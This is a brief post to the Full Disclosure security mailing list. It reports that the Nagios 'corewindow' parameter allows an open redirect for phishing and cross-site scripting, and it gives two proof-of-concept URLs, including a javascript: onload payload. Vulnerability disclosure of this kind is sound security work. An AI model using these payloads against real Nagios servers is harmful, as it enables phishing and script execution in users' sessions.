corewindow can be used to phish users: http://jdoe:[email protected]/nagios/index.php?corewindow=http://wikipedia.com
also to perform xss: http://jdoe:[email protected]/nagios/index.php?corewindow=javascript://zz%250a;onload=alert(document.domain)// _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
